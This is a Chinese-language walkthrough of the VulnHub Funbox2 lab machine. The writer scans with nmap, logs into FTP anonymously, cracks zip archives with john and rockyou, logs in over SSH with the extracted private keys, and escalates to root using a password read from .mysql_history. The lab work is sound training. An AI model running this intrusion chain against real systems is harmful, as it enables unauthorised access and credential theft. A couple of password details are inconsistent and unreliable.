VulnHub靶机-Funbox2
靶机地址:https://download.vulnhub.com/funbox/Funbox2.ova
配置环境
攻击机-VMware-桥接(复制)-kali
靶机-VirtualBox-桥接-(网卡根据网络连接状态选择)#在非校园网,校园网会分配到不同的网段
ps.如果靶机开着的情况修改网络连接方式,是需要重启的!
信息搜集
nmap扫描
nmap -sS 172.20.10.0/24
#172.20.10.0是本机的网关
#nmap -sP 是。。。# /24是。。。
#sS比较好看
nmap -p22,80 -A 172.20.10.2
#看一下ssh,http端口
http有个robots.txt
http://172.20.10.2/robots.txt
一脸懵,f12也没什么东西,http这个方向先pass
ssh不知咋搞,先pass
FTP渗透
连接ftp:ftp匿名访问
ftp 172.20.10.2
user:anonymous passwd:空
ls -la
下载ftp的文件
wget -r ftp://172.20.10.2
join爆破
zip2john anna.zip > anna
……
john anna --wordlist=/usr/share/wordlists/rockyou.txt
tom.zip获得itom/iubire
cathrine获得cathrine/catwoman
以上为ssh用户的私钥
ssh公钥认证
cat .@users
说明keys在zip里面,解压zip
unzip cathrine.zip
解压cathrine.zip获得id_rsa
ssh -i id_rsa cathrine@172.20.10.2
登录失败
解压tom.zip获得id_rsa
ssh -i id_rsa tom@172.20.10.2
登录成功
尝试提权-利用mysql
先习惯性检查文件
注意到.mysql_history
cat .mysql_history
发现tom的密码是xx11yy22!
尝试提权
su root
xxqqyy22!
cd
回到根目录
ls
cat flag.txt
成功啦~
总结:
1.信息搜集:nmap看ftp,ssh,http三大端口,走不通就换条路
nmap -sS 攻击机IP/24
2.ftp匿名登录:anonymous/空密码
ftp 靶机IP
anonymous/空
3.ftp文件下载:wget -r ftp://IP
wget -r ftp://IP
4.join爆破zip
zip2john A.zip > A
john A --wordlist=/usr/share/wordlists/rockyou.txt
5.ftp下载的文件好像都是用户信息,按照hint解压获得id_rsa
unzip A.zip
6.id_rsa用于登录ssh
ssh -i id_rsa A@靶机IP
7.尝试提权:mysql_history中有用户密码
ls -la
cat mysql_history
su root
输入密码
ls -la
cd回到根目录
cat flag.txt